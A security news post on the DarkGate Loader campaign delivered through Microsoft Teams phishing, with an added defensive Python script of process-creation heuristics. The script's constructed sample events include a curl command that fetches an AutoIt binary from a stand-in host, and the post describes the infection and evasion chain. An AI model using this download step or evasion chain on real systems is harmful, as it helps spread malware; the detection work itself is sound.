DarkGate Malware Exploitation via Microsoft Teams
A recent phishing strategy uses Microsoft Teams to distribute malicious attachments carrying the DarkGate Loader malware. Beginning in late August 2023, two compromised Office 365 accounts sent Microsoft Teams phishing messages that lured users with a ZIP file named "Changes to the vacation schedule". Opening it leads to a SharePoint download containing an LNK file disguised as a PDF.
Truesec's investigation into the campaign revealed that the ZIP file carried a malicious VBScript that starts the DarkGate Loader infection chain. The malware evades detection by using the cURL binary that ships with Windows to download its next stage and by concealing its malicious code inside an AutoIT script. Before proceeding, the script checks whether Sophos antivirus is present; if it is not, the script unpacks additional code and launches shellcode, which in turn builds the DarkGate executable and loads it.
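As an added example (not code from the original post or from Truesec), the stages above translate into a few process-creation heuristics a defender can run over endpoint telemetry; the Sysmon-style event fields and sample command lines are constructed assumptions, not data from the campaign:

```python
# Added example (not from the original post or Truesec's report): a few process-
# creation heuristics for the chain described above, run over constructed
# Sysmon-style events. Field names and sample values are assumptions.
from typing import Dict, Iterable, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # VBScript hosts
DOWNLOADERS = {"curl.exe"}                      # curl.exe ships with Windows
AUTOIT_HOSTS = {"autoit3.exe"}                  # AutoIt interpreter staging the loader

# Constructed sample events: parent process, child image, child command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\a\Downloads\vacation schedule.pdf.lnk"'},
    {"parent": "cmd.exe", "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\a\AppData\Local\Temp\schedule.vbs"},
    {"parent": "wscript.exe", "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\Users\a\AppData\Local\Temp\Autoit3.exe http://example.invalid/a"},
    {"parent": "wscript.exe", "image": "autoit3.exe",
     "cmdline": r"C:\Users\a\AppData\Local\Temp\Autoit3.exe C:\Users\a\AppData\Local\Temp\script.au3"},
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'},
]


def suspicious_reasons(event: Dict[str, str]) -> List[str]:
    """Return the heuristics an event matches (empty list means benign-looking)."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["cmdline"].lower()
    reasons = []
    # Shortcut disguised as a document: double extension ending in .lnk
    if ".pdf.lnk" in cmd or ".docx.lnk" in cmd:
        reasons.append("double-extension LNK posing as a document")
    # VBScript host using the built-in curl to fetch the next stage
    if parent in SCRIPT_HOSTS and image in DOWNLOADERS:
        reasons.append("script host spawned curl.exe (download stage)")
    # AutoIt interpreter started by a script host from a temp directory
    if parent in SCRIPT_HOSTS and image in AUTOIT_HOSTS and "\\temp\\" in cmd:
        reasons.append("script host launched AutoIt from a temp path")
    return reasons


def scan(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Collect every event that matches at least one heuristic."""
    hits = []
    for ev in events:
        reasons = suspicious_reasons(ev)
        if reasons:
            hits.append({"image": ev["image"], "reasons": reasons})
    return hits
```

Each heuristic on its own is noisy in a real fleet; the value is in the parent/child pairing and in seeing several of them fire in one process tree.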
While this campaign mirrors a June 2023 Microsoft Teams phishing technique reported by Jumpsec, Microsoft opted not to address the risk directly and instead recommended safer configurations to admins. A red teamer even released a tool in July 2023 that simplifies this phishing approach.
DarkGate, operational since 2017, is a formidable malware used by a select group of cybercriminals for targeted attacks. Its capabilities include remote access, cryptocurrency mining, keylogging, and information theft. In June 2023, its alleged creator tried selling access for a staggering $100k/year. Recent months have seen a surge in its distribution via channels like phishing.
Although not yet a ubiquitous threat, DarkGate's growing reach and diversification make it a menace to watch.